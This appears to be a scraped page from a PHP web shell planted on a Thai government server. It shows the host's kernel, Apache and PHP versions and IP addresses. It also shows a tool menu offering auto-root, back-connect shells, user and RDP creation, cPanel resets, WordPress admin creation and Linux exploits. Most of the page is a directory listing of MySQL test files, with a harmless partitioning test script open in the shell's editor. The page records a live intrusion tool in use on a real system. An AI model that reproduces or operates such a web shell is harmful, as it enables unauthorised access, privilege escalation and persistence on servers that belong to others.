Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
mysql-test /
suite /
parts /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
methods1.inc
6.92
KB
-rw-r--r--
part_blocked_sql_funcs_main.in...
8.81
KB
-rw-r--r--
part_supported_sql_funcs_delet...
2.67
KB
-rw-r--r--
part_supported_sql_funcs_main....
8.5
KB
-rw-r--r--
partition.pre
19.73
KB
-rw-r--r--
partition_10.inc
2.7
KB
-rw-r--r--
partition_11.inc
975
B
-rw-r--r--
partition_12.inc
2.51
KB
-rw-r--r--
partition_20.inc
2.63
KB
-rw-r--r--
partition_alter1_1.inc
3.43
KB
-rw-r--r--
partition_alter1_1_2.inc
3.04
KB
-rw-r--r--
partition_alter1_2.inc
5.98
KB
-rw-r--r--
partition_alter2_1.inc
7.03
KB
-rw-r--r--
partition_alter2_2.inc
7.01
KB
-rw-r--r--
partition_alter3.inc
8.26
KB
-rw-r--r--
partition_alter4.inc
6.72
KB
-rw-r--r--
partition_alter_1.inc
3.97
KB
-rw-r--r--
partition_alter_11.inc
6.79
KB
-rw-r--r--
partition_alter_13.inc
7.11
KB
-rw-r--r--
partition_alter_41.inc
7.21
KB
-rw-r--r--
partition_auto_increment.inc
22.89
KB
-rw-r--r--
partition_basic.inc
5.09
KB
-rw-r--r--
partition_basic_symlink.inc
2.23
KB
-rw-r--r--
partition_bigint.inc
1.75
KB
-rw-r--r--
partition_binary.inc
3.2
KB
-rw-r--r--
partition_bit.inc
3.46
KB
-rw-r--r--
partition_blob.inc
1.48
KB
-rw-r--r--
partition_blocked_sql_funcs.in...
5.3
KB
-rw-r--r--
partition_char.inc
3.08
KB
-rw-r--r--
partition_check.inc
43.69
KB
-rw-r--r--
partition_check_drop.inc
2.95
KB
-rw-r--r--
partition_check_read.inc
3.02
KB
-rw-r--r--
partition_check_read1.inc
2.87
KB
-rw-r--r--
partition_check_read2.inc
2.43
KB
-rw-r--r--
partition_cleanup.inc
1.29
KB
-rw-r--r--
partition_date.inc
2.13
KB
-rw-r--r--
partition_datetime.inc
2.14
KB
-rw-r--r--
partition_decimal.inc
2.57
KB
-rw-r--r--
partition_directory.inc
6.87
KB
-rw-r--r--
partition_double.inc
1.17
KB
-rw-r--r--
partition_engine.inc
11.48
KB
-rw-r--r--
partition_enum.inc
1.88
KB
-rw-r--r--
partition_float.inc
1.2
KB
-rw-r--r--
partition_int.inc
1.46
KB
-rw-r--r--
partition_key_16col.inc
1.51
KB
-rw-r--r--
partition_key_32col.inc
3.6
KB
-rw-r--r--
partition_key_4col.inc
597
B
-rw-r--r--
partition_key_8col.inc
1.01
KB
-rw-r--r--
partition_layout.inc
386
B
-rw-r--r--
partition_layout_check1.inc
3.31
KB
-rw-r--r--
partition_layout_check2.inc
3.08
KB
-rw-r--r--
partition_mediumint.inc
1.44
KB
-rw-r--r--
partition_methods1.inc
11.42
KB
-rw-r--r--
partition_methods2.inc
11.01
KB
-rw-r--r--
partition_mgm.inc
16.33
KB
-rw-r--r--
partition_set.inc
1.86
KB
-rw-r--r--
partition_smallint.inc
1.38
KB
-rw-r--r--
partition_supported_sql_funcs....
9.63
KB
-rw-r--r--
partition_syntax.inc
27.65
KB
-rw-r--r--
partition_syntax_1.inc
3.69
KB
-rw-r--r--
partition_syntax_2.inc
1.81
KB
-rw-r--r--
partition_text.inc
1.33
KB
-rw-r--r--
partition_time.inc
2.08
KB
-rw-r--r--
partition_timestamp.inc
2.61
KB
-rw-r--r--
partition_tinyint.inc
1.33
KB
-rw-r--r--
partition_trigg1.inc
4.56
KB
-rw-r--r--
partition_trigg2.inc
2.36
KB
-rw-r--r--
partition_trigg3.inc
3.22
KB
-rw-r--r--
partition_value.inc
7.24
KB
-rw-r--r--
partition_varbinary.inc
3.02
KB
-rw-r--r--
partition_varchar.inc
3
KB
-rw-r--r--
partition_year.inc
958
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : partition_varbinary.inc
--echo ---- Partitioning and varbinary data type eval create table t1 (a varbinary(767) not null, primary key(a)) engine=$engine partition by key (a) ( partition pa1 max_rows=20 min_rows=2, partition pa2 max_rows=30 min_rows=3, partition pa3 max_rows=30 min_rows=4, partition pa4 max_rows=40 min_rows=2); show create table t1; insert into t1 values (repeat('a',767)), ('b'), (repeat('a',500)), (repeat('b',64)); select * from t1; select * from t1 where a='b'; update t1 set a='bb' where a='b'; delete from t1 where a='bb'; select * from t1; drop table t1; eval create table t2 (a varbinary(767) not null, primary key(a)) engine=$engine partition by key (a) partitions 30; show create table t2; let $count=26; let $letter=0; --echo $count inserts; #--disable_query_log while ($count) { eval insert into t2 values (repeat(char(ascii('a')+$letter),$count*$count)); dec $count; inc $letter; } select count(*) from t2; select * from t2; drop table t2; if (0) { eval create table t3 (a varbinary(767) not null, primary key(a)) engine=$engine partition by range (ascii(a)) subpartition by key (a) subpartitions 4 ( partition pa16 values less than (16), partition pa32 values less than (32), partition pa64 values less than (64), partition pa128 values less than (128), partition pa256 values less than (256) ); show create table t3; let $count=26; let $letter=0; --echo $count inserts; #--disable_query_log while ($count) { eval insert into t3 values (repeat(char(ascii('a')+$letter),$count+54)); dec $count; inc $letter; } select count(*) from t3; select hex(a) from t3; drop table t3; eval create table t4 (a varbinary(767) not null, primary key(a)) engine=$engine partition by list (ascii(a)) subpartition by key (a) subpartitions 4 ( partition pa16 values in (1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16), partition pa32 values in (17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32), partition pa64 values in (33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64), partition pa128 values in (65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128), partition pa256 values in (129,130,131,132,133,134,135,136,137,138,139,140 ,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256) ); show create table t4; let $count=26; let $letter=0; --echo $count inserts; #--disable_query_log while ($count) { eval insert into t4 values (repeat(char(ascii('a')+$letter),$count+54)); dec $count; inc $letter; } select count(*) from t4; select hex(a) from t4; drop table t4; } #if (0)
Close